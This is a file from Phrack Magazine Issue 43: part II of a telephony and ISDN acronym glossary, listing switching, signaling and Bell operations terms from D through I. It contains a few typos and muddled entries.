(ECMA and CCITT q.930/931 oriented) ==Phrack Magazine== Volume Four, Issue Forty-Three, File 22 of 27 {Acronyms Part II} D Data D Default supervision D Digits D Dispach D Hotel/motel equipment from trouble report (TSPS only) D-CTL D channel controller (IDEC) D/A Digital to analog D1PK DS-1 interface pack (SCM-10S NTI) D1PK DS-1 interface pack (SCM-10S MUX NTI) DA Digital data off-net extention INTER/TRA blocal 1-26 DA Directory assistance DAC Digital to analog converter DAC Dispatch Administration Center DACC Directort assistance call completion DACK Direct memory access acknowledge DACOM Data communictions corp. of korea (ROK) DACS Digital access cross-connect system DACS Digital accessed and cross-connected system DACS Directory assistance charging system DACTVTD Deactivated DAEDR Delimitation DAIS Distributed automatic intercept system DAML Digital added main line (pair gain) DAMT Direct access mechanize testing DAP Display administration process DAP Document application profile DARC Division alarm recording center DART Distribution area rehabilitation DARU Distributed automatic intercept system audio response unit DAS Data auxiliary set DAS Directory assistance system DAS Distributor and scanner DAS-WDT Distributor and scanner-watch dog timer DAS/C Directory assistance system/computer DASD Direct access storage device DASS2 Digital access signaling system 2 (BT) DAU Digital access unit DAV Data above voice DAY Delete an assembly DB DSSDS 1.5 mb/s access line INTER/TRA blocal 1-26 DB Decibel DBA Data base administrator DBAC Data base administration center DBAS Data base administration system DBCS Data bank control system DBL Data base load DBM Database manager DBMS Data base management system DBOS Data bank organization system DBS Duplex bus selector DBSS Data bank security system DC Device cinfirmation (C/I channel code) DC Dial code DC Direct current DCC Data collection computer DCC Data country code (ISO 7498) DCC Destination code cancellation DCC Destination code cancellation control DCC Digroup core controller DCCS Discontiguous shared segments DCD Data collection device DCE Data circuit terminal equipment DCE Data circuit-terminating equipment DCE Data communications equipment DCE Digital carrier equipment DCG Default cell group DCH D channel handler DCH D-channel handling bit DCH Discharge DCHOOS D-channel is out of service. DCL Data clock (i.e. IOM2) DCL Dec control language DCLU Digital carrier line uint DCLU Digital carrier line unit DCM Digital carrier module DCME Digital circuit multiplexing equipment DCMS Distributed call measurement system DCMU Digital concentrator measurement unit DCN List disconnected and changed numbers DCP D channel processor DCP Duplex central processor DCPR Detailed contuing property record (pics/dcpr) DCPSK Differential coherent phase-shift keying DCS Data communications subsystem DCS Digital crosconnect system DCS Digital cross-connect system DCS Direct current signaling DCSO Display compleated service order (lmos command) DCT Digital carrier trunk DCTB Dct bank DCTEXT DCT extended DCTN Defense commercial telecommunications network DCTS Dimension custom telephone service DCTUCOM Directly connected test unit common board DCTUPORT Directly connected test unit port circuit DCn Device control n DD Data downstream (i.e. IOM2) DD Delay dial DD Disk drives DD Due date DD Total switching control center (SCC) and field work time. DDC Direct department calling DDCMP Daily display conversation mode and printer DDD Direct distance dialing DDGT Digital data group terminal DDI Direct dialing-in (i.251 A) DDN Defense data network DDOV Digital data over voice DDS DDS loopback test (SARTS command) DDS Dataphone digital service DDS Digital data service DDS Digital data system DDS Digital data system (the network) dataphone digital DDS Digital dataphone service DDS Display the DS table DDX Digital data exchange DDX Distributed data exchange DEAC Deactivation (C/I channel code) DEACT Deactivate DEC Digital equipment corporation DECT Digital european cellular phone DEL Delete DEN Digital equipment number DERP Defective equipment replacement program DES Data encryption standard DES Destination DEST Destinations DET Detatch MSG. (i.451) DEV Deviation DEV Device DEW Distant early warning (line) DF Distributing frame DF Distribution frame DF HSSDS 1.5 mb/s hub to hub INTER/TRA blocal 1-26 DFC Disk file controller DFI Digital facility interface DFI Digital facility interface. DFI Digital family interface DFIH Digital facility interface circuit pair DFMS Digital facility management system DFTAC Distributing frame test access circuit DG HSSDS 1.5 mb/s hub to earth station INTER/TRA blocal 1-26 DGCT Diagnostic control table DGN Diagnose DGN Memory failure in CS/PS diagnostic program - 1AESS mem diag DH Digital service INTER/TRA blocal 1-26 DI Deactivation indication (C/I channel code) DI Direct-in dial INTER/TRA blocal 1-26 DI Unk division? DIA Document interchange architecture DIAG Diagnostic DIC Digital concentrator DIC Digital interface controller DID DI downstream DID Direct inward dialing DIF Digital frame interface DIF Digital interface DIF Digital interface frame DIFF Difference DILEP Digital line engineering program DIM Data in the middle DIP Dedicated inside plant COSMOS command DIP Dip creation option DIP Document interchange protocol (lower sublayer of OSI layer 6) DIP Dual in-line package DIR Direction DIR Directory DIR Standard dip report DIS Disconnect DIS Display DISA Direct inward system access DISABL Disable DISC Disconnect (LAP-D command) DISD Direct inward subscriber access DIST Distribute point board DIU Deactivate indication DIU Digital interface unit DIU Digroup interface unit (DACS) DIV (Ger) Digital exchange DIVF (Ger) Div for long distance service DIVO (Ger) Div for local service DJ Digit trunk INTER/TRA blocal 1-26 DK Data link INTER/TRA blocal 1-26 DL Dial DL Dictation line INTER/TRA blocal 1-26 DL1PE DLI 1 parity error DL5MDA Someone who collects each ISDN abbrevation crossing his way DLAB Divisor latch access bit DLC Data link control DLC Data link controller assignment for clusters DLC Digital loop carrier DLCI Data link connection identifier (i.440: SAPI+TEI) DLCU Digital line carrier unit DLE Data link escape (ascii control) DLI Data link interface DLI0I Data link 0 interrupt DLI1I Data link 1 interrupt DLISW DLI switch error DLL Dial long lines DLM Data link module DLN Direct link node DLNORSP Init response not received from data link. DLOPE Dual link interface (DLI) 0 parity error DLP Data level point DLS Digital line section DLS Digital link service DLTHA Display trouble history all (LMOS command) DLTU Digital line trunk unit DLTU Digital line/trunk unit DLU-PG Digital line unit-pair gain DLUC Digital line unit control DLYR Delayed readiness DM DMR DM Delta modulation DM Disconnected mode (LAP-D response) DMA Direct memory access DMB Digital multipoint bridge DMERT Duplex multiple environment real time DMI Digital multiplexed interface DML Data manipulation logic DMLHG DSN/AUTOVON MLHG DMQ Deferred maintenance queue DMS Data management system DMS Digital multiplex system (i.e. DMS 10, DMS 100) DMS Digital multiplexed system DMU Data manipulation unit DN Directory number DN Directory numbers DN Distribution network panel DN Down DN Mail distribution frame - COSMOS defult DNC Dynamic network controller DNH Directory Number Hunting DNHR Dynamic non hierarchical routing DNHR Dynamic nonhierarchical routing DNI Digital network interconnecting DNIC Data network identification code DNIC Data network identification code (ISO 7498) DNR Detaled number record DNR Dialed number recorder DNX Dynamic network X-connect DO Direct-out dial INTER/TRA blocal 1-26 DOC Dynamic overload control DOC Dynamic overload controls messages. DOCS Display operator console system DOD (USA) Dept. of defense DOJ Department of justice DOM Data on master group DOTS Digital office timing supply DOV Data over voice DP Demarcation point DP Dial pulse DP Digital data-2 4 kb/s INTER/TRA blocal 1-26 DPA Different premises address DPA Dispatch DPA Distributed power architecture DPAC Dedicated plant assignment card DPAC Dedicated plant assignment center DPC Destination point code (SSY) DPCM Differential PCM DPE Data path extender DPGS Digital pair gain systems DPIDB Direct PIDB DPIDB Directly connected peripheral interface data bus DPLL Digital phase locked loop DPN Dip purge number DPN-PH Data packet network-packet handler DPNSS Digital private network signaling system (BT) DPP Discounted payback period DPP Distributed processing peripheral DPR Dip report and removal DPSK Differential phase shift keying DPSK Differential phased-shift keying DPT Data parameter testing DPT Department name DPU Digital patch unit DQ Digital data-4 8 kb/s INTER/TRA blocal 1-26 DQR Design quota system report DQS Design quota system DR Data ready DR Data receive DR Deactivate request (C/I channel code) DR Deactivation request DR Digital data-9.6 kb/s INTER/TRA blocal 1-26 DRAM Digital record announcement machine DRAM Dynamic ram DRCS Dynamically redefinable character sets DRHR Division of revenue hourly DRMU Digital remote measurement unit DRTLRT Dial repe tie lindal repeatie t DRU DACS remote unit DS Data set DS Digital carrier span DS Digital signal DS Direct signal DS-0 Digital signal 0 (one channel at 64 kb/s) DS-0A Digital signal at a subrate level on DS-0 for one customer DS-0B Digital signals at a subrate level on DS-0 facility for one or more CU DS-1 Digital signal level one DS0 Digital signal zer0 DSBAM Double-sideband amplitude module DSBLD Disabled (default). DSC Digital cross-connection systems DSC Digital subscriber controller AM79C3A DSCT Digital service copper transport DSDC Direct service dial capability DSI Digital speech interpolation DSIG Direct signaling DSK Disk DSL Digital subscriber line DSL Digital suscriber line DSLG digital subscriber line group (DSLG) DSLINIT DSL initialization. DSM Digital switching module DSMX (Ger) Digital signal multiplexer DSN Defense switched network/automatic voice network DSN Digital signal (level) n DSNE Double shelf network equipment frame DSNOFC DSN/AUTOVON office totals DSNTG DSN/AUTOVON trunk group DSP Digital signal processing DSP Digital signal processing or digital signal processor DSP Digital signal processor DSP Domain specific part (ISO 7498) DSR Data set ready DSR Display results DSR Dynamic service register DSRTP Digital service remote test port DSS Data station selector DST Destination of order response DSU Data service unit DSU Data servicing unit DSU Digital service unit DSU2 Diditalservice unit DSX Digital cross-connect DSX Digital signal cross-connect DT DI-group terminal DT Data through (C/I channel code in test mode) DT Data transmit DT Detect dial tone DT Due time DT1 Data form class 1 DTAC Digital access connector DTAC Digital test access connector DTAC Digital test access connector (links SMAS and SLC-96) DTAM Document transfer access and manipulation DTAS Digital test access system DTAU Digital test access unit DTC Data test center DTC Di-group terminal controller DTC Digital telephone controller (ARCOFI + IBC + ICC) DTC Digital trunk controller DTE Data terminal equipment DTE Print current date DTF Dial tone first (pay phone) DTG Direct trunk group DTIF Digital transmission interface frame DTM Data test module DTM Digital trunk module DTMF Dual-tone multifrequency DTR Data terminal ready DTRK Digital Trunks DTRK Digital trunks (line and trunk) DTU Di-group terminal unit DTU Digital test unit DU Data upstream (i.e. IOM2) DU Deactivation request upstream (C/I channel code) DUIH Direct user interface handler DUP Data user part DUP Duplicate DUR Duration DUV Data under voice DVA Design verified and assigned DVX Digital voice exchange DW Digital data-56 kb/s INTER/TRA blocal 1-26 DX Duplex DY Digital service (under 1 mb/s) INTER/TRA blocal 1-26 DYRECT Sides dynamic real time communication tester (in sitest) E E (receive) signal lead (moreover Ear part of E&M) E Equipment direction E Remote trunk arrangement position subsystem (rta/pss) from troubl E&M Receive & transmit/ear & mouth signaling E-COM Electronic computer originated mail E1 Equipment system E800 Enhanced 800 Service E911 Enhanced 911 EA Equal access end office EA Expedited data acknowledgement (SS7: in SCCP) EA Extended adress EA Switched acess INTER/TRA blocal 1-26 EAAT Equal access alternative technologies EADAS Engineering and administration data acquisition system EADAS/NM EADAS/network management EAEO Equial access end office EAI Emergency action interface EAP Equal access plan EARN European academic research network EAS Extended announcement system EAS Extended area service EASD Equal access service date EB Enfia ii end office trunk INTER/TRA blocal 1-26 EBAC Equipmentc billing accuracy control EBCDIC Extended binary coded decimal interexchange code EBSP EBS prefix translations EBSP Enhanced business services prefix translations EC ESS entity and control group number EC Echo canceller EC Enfia ii tandem trunk INTER/TRA blocal 1-26 EC Environment code EC European community EC Exchange carriers ECAP Electronic customer access program ECC Enter cable change ECCS Economic c (hundred) call seconds ECD Equipment configuration database ECDMAN Equipment configuration database manager ECF Enhanced connectivity facility ECL Emitter coupled logic ECMA European computer manufactueres association ECPT Electronic coin public telephone ECR Exchange carrier relations ECS Electronic crosconnect system ECS Equipment class of service ED Enter date EDAC Electromechanical digital adapter circuit EDD Envelope delay distortion EDI Electronic data interchange EDP Electronic data processing EDSC Electronic directory customer counts (ISDN BRCS) EDSX Electronic digital signal x-connect EDZ Facility emergency assignment list EE Combined access INTER/TRA blocal 1-26 EE Initials of supervisor reviewing this ticket. EEC Electronic equipment cabinet EECT End-to-end call trace EEDP Expanded electronic tandem switching dialing plan EEE Electronic equipment enclosures EEHO Either end hop off EEI Equipment-to-equipment interface EEPROM Electrically erasable programmable read only memory EF Entrance facility-voice grade INTER/TRA blocal 1-26 EFCTS Electronic custom telephone service EFRAP Exchange feeder route analysis program EG Type #2 telegraph INTER/TRA blocal 1-26 EIA Electronic industries association EIS Expanded inband signaling EISS Economic impact study system EIU Extended interface unit EIn Error indication n (C/I channel code) EKTS Electonic key telephone service EKTS Electronic key telephone sets EL Emergency reporting line INTER/TRA blocal 1-26 ELA Entity load analysis ELDS Exchange line data service ELECL Electrical ELEMNTS Elements ELI Electrical line interface EM Emergency reporting center trunk INTER/TRA blocal 1-26 EM Encription module EM End of medium (ASCII control) EMC Electromagnetic capability EMC Electromagnetic compatibility EME Electromagnetic emission EMI Electromagnetic interference EML Expected measured loss EMM Expandable mos memory EMS Electromagnetic susceptibility EMS Expanded memory specification EMSCC Electromechanical switching control center EMV EMC (german) EN Entity EN Entity number EN Exchange network acess facility INTER/TRA blocal 1-26 ENABL Enable ENFIA Exchange network facility for interstate access ENHMT Enhancement ENQ Enquiry ENTDT Entered date and/or time EO End office EOC Embedded operation channel EOE Electronic order exchange EOM End of message EOS Extended operating system EOTT End office toll trunking EP Entrance facility-program grade INTER/TRA blocal 1-26 EP Expedited data (SS7: in SCCP) EPIC Extended PIC EPL Electronic switching system program language EPROM Erasable programmable read-only memory EPSCS Enhanced private switched communication service EQ Equalizer EQ Equipment only-(network only) assignment INTER/TRA blocal 1-26 EQPT Equipment ER Enhancement request ER Error register ER Exception report ERAR Error return address register ERC Error control (IOS) EREP Environmental recording editing and printing ERF Emergency restoration facility ERL Echo return loss ERP Effective radiated power ERPMP Exception report pumper ERR Error ERRS Errors ERTS Error rate test set ERTS Error rate test sets ERU Error return address update ES Extension service-voice grade INTER/TRA blocal 1-26 ESAC Electronic systems assistance center ESAP Emergency Stand-Alone prefix ESAP Emergency stand-alone prefix ESB Emergency service bureau ESC Enhanced speech circuit ESC Escape (ASCII control) ESC Three way calling USOC ESCC2 Extended high level serial communication controller ESCC8 Like ESCC2 ESD Electrostatic discharge ESD Extened super framing ESF Extended super frame ESF Speed calling USOC ESFF Extended superframe format ESL Emergency stand-alone ESL Essental service ESL Speed calling 8 code USOC ESM Call forwarding USOC ESM Economic study module ESMTC Electronic system maintance ESN Electronic serial number (Cell) ESN Electronic switched network ESN Emergency service number ESP Enhanced service procider ESP Enhanced service providers ESP Essential service protection ESP Print entire summary table ESS Electronic switching system ESSX Electronic switching systen exchange EST Established ESTAB Establish ESX Call waiting USOC ET Entrance facility-telegraph grade INTER/TRA blocal 1-26 ET Exchange termination ETAS Emergency technical assistance ETB End of transmission block ETC Estimated trunk ccs value ETF Electronic toll fraud ETL Equipment test list ETN Electronic tandem network ETRI Electronics and telecommunications research institute (ROK) ETS Electronic tandem switching ETS Electronic translation systems ETSACI Electronic tandem switching adminstration channel interface ETSSP ETS status panel ETX End of text EU End user EU Extension service-telegrasph grade INTER/TRA blocal 1-26 EUPOT End user-point of termination EV Enhanced emergency reporting trunk INTER/TRA blocal 1-26 EV Expected value EVB Busy call forward USOC EVC Bust call forward extended USOC EVD Delayed call forward USOC EVD Delayed call forwarding EVST (Ger) End exchange EW Off network MTS/WATS equivalent service INTER/TRA blocal 1-26 EWSD (Ger) Electronic dialing system (digital) EX Exercise EXD ECS crossloading option EXD Extra digit EXD Extra digit (MDII) EXP Extra pulse EXP Extra pulse (MDII) EXT Extension EXTC Expenditure type code F Facility direction F Fault (indicator) F Office or base unit from trouble report. F1 Facility system FA Frame aligner FA Fuse alarm FAA Facility accepted (SS7 in ISUP) FAC Facility FAC Facility Assiment Center FACD Facility changed msg. FACS Facilities assignment and control system FADS Dorce administration FANALM Fan alarm FAP Facilities analysis plan FAR Facility request (SS7: in ISUP) FAR Federal acquisition regulation FAS Frame alignment signal FAST First application system test FAT File allocation table FAX Faximile FC Feature control FC Frame control FC From cable FC/EC Function code and environment code FCA Final closure abandon (MDII) FCAP Facility capacity FCC Federal communications commission FCC Forward command channel FCC Frame control center FCD Frame comtinuity date FCG False cross or ground FCS File control systemction FCS Frame check sequence FD Private line-data INTER/TRA blocal 1-26 FDD Frame due date FDDI Fiber distributed data interface (x3t9.5) FDI Feeder/distribution interfaces FDM Frequency division multiplex FDM Frequency-division multiplexing FDMA FDM access FDP Field development program FDT Frame due time FDX Full duplex FDY Set fiscal day for LAC FEA Custom calling feature/PIC FEA Customer feature FEAT Feature FEAT Features FEBE Far end block error (IOM2 monitor message) FEC Forward error correction FECC Front end communication computer FED Far end data FELP Far end loop process FEMF Foreign electro-motive force FEPS Facility and equipment planning system FEV Far end voice FF Check appropriate space where trouble is located FF Form feed FG Group-supergroup spectrum INTER/TRA blocal 1-26 FGA Feature group A FGB Feature group B FGC Feature group C FGD Feature group D FGE Feature group E FGK Feature group K (ISDN Q.931) FIB Forward indication bit (SS7) FID Field indentifiers FIFO First in FIFO First in first out (storage) FIL Filter FIN Facility information msg. FIOC Frame input/output controller FIP Facility interface processor FIPS Federal information processing standards FISU Fill in signal unit (SS7) FITL Fiber in the loop FJ Frame jump (C/I channel code) FKP False key pulse FKP False key pulse (MDII) FL Fault locate FL Fault location FLA Flag FLD Field FLEXCOM Fiber optic communication FLR Frame layout report FLT Flat FM Frequency modulation FM01 DCT alarm activated or retired - 1AESS FM02 Possible failure of entire bank not just frame - 1A FM03 Error rate of specified digroup - 1AESS FM04 Digroup out of frame more than indicated - 1AESS FM05 Operation or release of the loop terminal relay-1AESS FM06 Result of digroup circuit diagnostics -1AESS FM07 Carrier group alarm status of specific group - 1AESS FM08 Carrier group alarm count for digroup - 1AESS FM09 Hourly report of carrier group alarms - 1AESS FM10 Public switched digital capacity failure - 1AESS FM11 PUC counts of carrier group errors - 1AESS FMAC Facility maintance administration center FMAC Facility maintenance and control FMC Force management center FMM Finite message machine FN Feature number FN File name FNBE Far and near end block error (IOM2 monitor message) FNPA Foreign numbering plan area FOA First office application FOC Fiber optic communications FON Fiber optics network FOR Frame order report FORPOT Foreign potential. FOS Frame operations summary FOS-ALC Fiber optic systems maintance - Alcatel FOS-ROCK Fiber optic system maintance - Rockwell FOT Forward transfer (SS7: in ISUP) FP Functional protocol FPC Foundation peripheral controller FPC Frequency comparison pilots FPS Fast packet switching FR Fire dispatch INTER/TRA blocal 1-26 FR Fixed resistance FR Flat rate FRAC Frame aligner circuit FRC Forced request configuration FREQ Frequency FRJ Facility rejected msg. (SS7 in ISUP) FRMR Frame reject (LAP-D response) FRPS Field reliability performance studies FRQ Facility request message FRS Flexible route selection FS File separator FS/SYM Function Schematic/Symbol Numbers (1AESS Test access) FSA False start abandon FSA False start abandon on incoming trunk FSC Frame synchronization clock (i.e. IOM2) FSK Frequency shift keying FSN Forward sequence number FT Foreign exchange trunk INTER/TRA blocal 1-26 FT Frame time FTA Frame transfer analysis FTC Frame transfer completion FTE Frame transfer establishment FTG Final trunk group FTL Frame transfer lets FTP File transfer protocol FTR Frame transfer reprint FTS Federal telecommunications system FTW Frame transfer withdrawal FUNCS Functions FV Voice grade facility INTER/TRA blocal 1-26 FW Wideband channel INTER/TRA blocal 1-26 FWD Forward FWM Frame work management FWS Frame work station FX Foreign exchange FX Foreign exchange INTER/TRA blocal 1-26 FXO Foreign exchange circuit office direction FXS Foreign exchange circuit station direction G Spare box. use for special studies. GAP (Ec) group of analysis and provision (for ONP) GB Great britain GBS Group bridging service GC Group card GCE Gated Oscillator Error GCI General circuit interface (IOM/u(k0)-interface) GCON Generic conditions GCP Generate Control pulse GCR General configuration register GCS Group control system GDSUCOM Global DSU common GDSUCOM Global digital service unit common GDX Gated diode crosspoint GDXACC Gated diode crosspoint access GDXC Gated diode crosspoint compensator GDXCON Gated diode crosspoint control circuit GEISCO General electric information services company GFR General facility report GG Getails of reported trouble. GH Gain hit GHZ Gigahertz GID Group ID GKCCR Generated key collection and compression routine GLA Generate lists for assignment GND Ground GNS Gainslope GNS Gainslope test (SARTS command) GOC General order control (TIRKS) GOS Grade of service GP Group processor GPA Gas pressure alarm GPIB General purpose interface bus GPPC General purpose power controller GPS Global positioning system GR General requirments (BellCoRe) GRA GRS acknowledgement GRASP Generic access package GRD Ground fault. GRD Ground. GRID Line unit grid. GRP Group GRP MOD Group modulator GRS Circuit group reset (SS7: in ISUP) GS Ground start (on-hook normal) GS Group separator GSA General services administration GSAT General telephone and electronics satellite corporation GST Ground start signaling GSZ Group size GTC General telephone company GTE General telephone electronics GTEI Global tei GTS Gamma transfer service GTT Global title transmission GWY Gateway Ger German H Hold state (in EOC) H Hours H Trouble ticket number. subparagraph 5.6.4. H&D High and dry (trunk test) H- High- H-RAP Hardware reliability assurance program HAC Hands-free add-on circuit (for speakerphone) HBS Hunt group blocks of spares HC High capacity 1.544 mb/ps-service code for LATA access HC Hunt count HCDS High capacity digital service HCDS High-capacity digital services HCFE High-capacity front end HCSDS High-capacity satellite digital service HCTDS High-capacity terrestrial digital service HD High capacity 3.152 mb/ps-service code for LATA access HDB3 High-density bipolar 3 (cept PRI) HDFI HSM digital facilities interface HDLC High level DLC HDLC High-level data link control HDSL High bit-rate digital subscriber line HDTV High definition television (soon to be the new buzz word!!) HDW Hardware HDX Half duplex HE High capacity 6.312 mb/ps-service code for LATA access HEAP Home energy assistance program HEHO High end hop off HF High capacity 6.312-service code for LATA access HF Hunt-from telephone number HFCC High capacity facility control center HFR Hardwara failure rate HG High capacity 274.176 mb/s-service code for LATA access HGBAF Hardware group blocking acknowledgment failure HGR Hunt group report HGS Hunt group summary HGUAF Hardware group unblocking acknowledgment failure HH History header HH Record of repair activity. HI High HI High impedance (C/I channel code) HI Highway interrupt HIC Hybrid integrated circuit HIM Host interface module HIS Hunting ISH HK Hook HL IT Siemens semiconductors (hl) HLC Highest lead factor group count HLDG Holding HLLAPI High level language application program interface HLSC High-level service circuits HM1 Intercom plus USOC HMCL Host message class assignment HMP Intercom plus HNPA Home numbering plan area HNS Hospitality network service HOBIC Hotel billing information center HOBIS Hotel billing information system HOLD Call hold (i.253 b) HP Hewlett-packard HP Non-DDS digital data 2.4 kb/s INTER/TRA blocal 1-26 HPO High performance option HQ Non-DDS digital data 4.8 kb/s INTER/TRA blocal 1-26 HR Hour HR Non-DDS digital data 9.6 kb/s INTER/TRA blocal 1-26 HRS Hours prefix HS High capacity subrate-service code for LATA access HSCC High level serial communication controller sab82520 HSCX Extended hscc sab82525 HSM Host switching module HSSDS High-speed switched digital service HT Horizontal tabulator HT Hunt-to telephone number HTI Highway transfer interrupt HU High usage HU High-usage trunk HUNT Hunting HUTG High usage trunk group HW High and wet. HW High-and-wet HW Non-DDS digital data 56 kb/s INTER/TRA blocal 1-26 HW Pcm highway HZ Hertz I Cable and pair or associated equipment I Information (LAP-D command) I Installation I Invalid I&I Investment and inventory I&M Customer services installation and maintenance I&M Installation & maintenance I- Information (numbered i-frames) I/O Ineffective other I/O Input/output devices I/O Tnput/output I0 Feature removed I1 Added feature IA Immediate action IA Ineffective attempts IAA Ineffective attempt analysis. IAAN Immediatel action report IAC0 DLI 0 access error IAC1 DLI 1 access error IACS Intergrated access cross-connected system IAD Incomplete address detected (incoming) IAM Initial address msg. (SS7: in ISUP) IB Instruction buffer IBC ISDN burst transceiver circuit IBN Integrated business network IBROFC ISDN BRCS and Analog Office totals IC Incoming call (x.25) IC Independent carrier IC Installation centers IC Inter-LATA carrier IC Inter-exchange carrier IC Interexchange carriers IC/MC Installation and maintence centers ICA Incoming advance ICA Incoming advance (MDII) ICAN Individual circuit analysis ICAO International civil aviation organization ICC ISDN communications controller ICC Interstate commerce commission ICCU Inmate call control unit ICD Interactive call distribution ICL Intra-RSM communication link ICLID Individual calling line id ICM Integrated call management ICN Interconnecting network ICOM (taiwan) integrated communication ICOT Intercity and outstate trunk ICP Intercept ICPOT Interexchange carrier-point of termination ICSC Inter-LATA customer service center ICSC Interexchange carrier service center ICSC Interexchange customer service center ICUG International closed user groups ICUP Individual circuit usage and peg count ICUR Individual circuit usage recorder ID Idle control code IDA (gb) interated digital access (b64+b8+d8) IDC Information distribution companies IDCI Interim defined central office interface IDCU Integrated digital carrier unit IDCU Integrated digital carrier unit . IDCU Integrated digital carrier unit i.e. AT&T Series 5 RT FP 303G IDDD International direct distance dialing IDEC ISDN d-channel exchange controller IDF Intermediate distributing frame IDI Initial domain identifier (ISO 7498) IDLC Integrated digital loop carrier IDLC Intergrated digital loop carrier IDP Individual dialing plan IDPC Integrated data protocol controller IDS Internal directory system IDVC Integrated data/voice channel IEC ISDN echo cancellation circuit IEC Interexchange carrier IEC International electrotechnical comission IEC-P (old name of iec-q3) IEC-Q1 Iec for 2b1q peb2091 IEC-Q2 Iec-q specially for lt and NT1 (without microprocessor) IEC-Q3 Iec-q with parallel processor interface (i.e. for daml) IEC-T Iec for 4b3t peb2090 IEEE Institute of electrical and electronics engineers IEPC ISDN exchange power controller IF Intermediate frequency IFAC Integrated digital carrier unit facility IFRB International frecuency registration board IFRPS Intercity facility relief planning system IFS (switzerland) integrated telecom service IGS Idenitfy graphic subrepertoire (teletex) IIN Integrated information network IJR Input a jeopardy reason ILC ISDN link controller ILINE IDCU line counts. IM Input mux IM Interface module IMA Additional ineffective machine attempts IMAS Integrated mass announcement system IMC IOS mailbox control IMCAT Input message catalog IMCF Interoffice multiple call forwarding IMD Intermodulation distortion IMM Input message manual IMMU IOS memory management unit IMP Impedance IMP Impules per minute IMP Interpersonal messaging protocol (x.420: p2) IMS Interprocessor message switch IMT Inter-machine trunk IMTS Improved mobile telephone service IMU Input measured ccs usage data IN Intelligent network IN/1 Intelligent network/1 INA Intergrated network access INAP Intelligent network access point INC Incoming trunk groups INC International calling INC International carrier INC SEL Incoming selector INCAS-A Integrated network cost analysis - access INCAS-LT Integrated network cost analysis - local and toll INCAS-S Integrated network cost analysis - shared INCAS/E Integrated network cost analysis system INCAS/I Integrated network cost analysis system - embedded INCIS Integrated network cost information system INCP Incomplete IND Individual INF Information INF Information (SS7: in ISUP) INIT Allocation table initalization INL Inter node link INN Inter node network INQ Complete circuit inquiry INR Information request (SS7: in ISUP) INS (japan) information network system (b64+b16+d8) INT Interrupt (i.e. C/I channel code) INTCCTRL International code control (NTI) INTCHG Interexchange INTEGRIS Integrated results information service INTELSAT International telecommunications satellite consortium INTR Interrupt INW INWATS [code 258(8000-8299)] INWATS Inward wide area telecommunications system INWATS Inward wide area telephone service INWBLKD INWATS returned blocked INWBLKD Inward wide area telecommunications service (INWATS) returned blocked INWBUSY INWATS all lines busy INWCCBL INWATS code control blocked INWDBOV INWATS data base overload INWDBTO INWATS data base timeout INWDSBL INWATS direct signaling blocked INWNNPA INWATS nonpurchased NPA INWNNPA INWATS nonpurchased numbering plan area (NPA) INWNOXL INWATS returned no translation INWONPA INWATS invalid ONPA INWONPA INWATS invalid originating numbering plan area (ONPA) INWOVLD INWATS returned overload INWUNEQ INWATS returned unequipped INWVLIN INWATS vacant line number INWVNXX INWATS vacant NXX IO Inward operator IOAU Input/output access unit (univac) IOC Independent operating company IOC Input/output controler (shelf) IOC Integrated optical circuit IOC International overseas center IOCC International overseas completion center IOCP Input/output configuration process IOCS Input/output control system IODB IDCU on-demand B-channel IOI Secondary input/output interface pack(s) IOM ISDN-oriented modular (architecture and interfaces) IOM2 Extended iom IOMI Input/output microprocessor interface IOP Input-output processor IOP Input/output Processor IOP Input/output driver IOP Input/output processor IOS ISDN operational software IOS Input/output supervisor (IBM) IOS Inventory order system IOSF Input/output shelf assignment IOT Inter-office trunk IOT Interoffice test command (SARTS command) IOT Interoffice testing IOTC International originating toll center IP Information provider IP Inprogress IP Intermediate point IP Internet protocol IPABX ISDN pabx IPAC ISDN pc adapter circuit IPACS Interactive planning & control system IPAT ISDN primary access transceiver IPB Sipb IPBC IOM2 PBC (old name for EPIC) IPC Inter-process communication IPC Interprocess communication IPCS IOS process control system IPCS Installation product costing system IPCS Interactive problem control system IPIB Intelligent personal computer interface board IPIDB IDCU peripheral interface data bus IPL Initial program load IPL Interoffice private line signaling IPL Interoffice private line signaling test (SARTS command) IPLAN Integrated planning and analysis system IPLS InterLATA private line services IPM Impulse per minute IPM Impulses per minute IPM Interruptions per minute IPP IOS protocol part IPP Integrated planning process IPPC Interdepartmental project planning committee IPR Installation performance results system IPS Installation performance results IPS Integrated Provisioning System IPS Integrated provisions system IPX Integrated packet exchange IQS Instant request system IR Incoming register IRBR Integrated resource billing report system IRC International record carrier IRIS Industry relations information system IRLF Incoming register link frame IRM Information resource management IRMC Incoming register marker connector IRO Industry relations operations IROR Internal rate of return IRP Integrated revenue planning IRPC ISDN remote power control psb2120 IRR Internal rate of return system IRRS Interactive request and retrieval system IRS Industrial revenue summary IRT IDCU remote digital terminal IRU Integrated recovery utility (sperry) IS Interrupt set IS/SADQ Interstate special access demand quantification ISA Indicate status application ISAC-P ISDN subscriber access controller ISAC-S ISDN subscriber access controller ISAM Indexed sequential access method ISC Intelligent serial controller ISC International switching center ISC Planintercompany services coordination plan ISC/TE Information systems center for technical education ISCAR Information systems costs analysis reports ISCOM SWBT intercompany service coordination (ISC) order monitor ISCP Integrated service control point ISCP/MSAP ISCP/multi-service application platform ISCP/SPOCK ISCP/service provisioning and on-line creation tool kit software ISDN Integrated services digital network ISF Inquire on a single facility ISG Isolated system grounding ISH Complete circuit inquiry short ISI Industry support layout ISIS Interstate settlements information system ISLM Integrated services line module ISLU Integrated services line unit ISLUCC Integrated services line unit common controller ISLUCD Integrated services line unit common data ISLUHLSC Integrated services line unit high level service circuit ISLUMAN Integrated services line unit metallic access network ISLURG Integrated services line unit ringing generator ISM ISDN switching module ISM Interactive synchronous mode ISMP Industry specific measurement plan ISMS Integrated service management system ISMTL Information systems management training ISN Information systems network ISN Integrated systems network ISNET Interim solution network (Kansas city only) ISO Information systems organization ISO International organization for standardization ISOFC ISDN office totals ISOPDB Information systems organization planning data base ISOSS Intercompany service order switching system ISP Intermediate service part ISPBX Integrated systems PBX ISPC International signaling point code (SS7) ISPF Interactive system productivity facility ISPI ISDN packet interface ISRP Information systems rules panel ISS Integrated switching system ISS Issue ISSANRC Interstate special access non-recurring ISSC Interfunction special service coordination ISSCO Intertoll ISSN Integrated special services network ISSN Intergrated specal services network ISSS ISDN supporting system ISTA Interrupt status register ISUP ISDN user part ISUP ISDN user part (SS7: q.76x) ISUP Integrated services user part IT Inactivity test (SS7: in SCCP) IT Intertandem tie trunk INTER/TRA blocal 1-26 ITAC ISDN terminal adaptor circuit ITC Independent telephone company ITC Interdepartmental training center at dallas-texas for ITD Intertoll dial ITEA Interoffice trunks 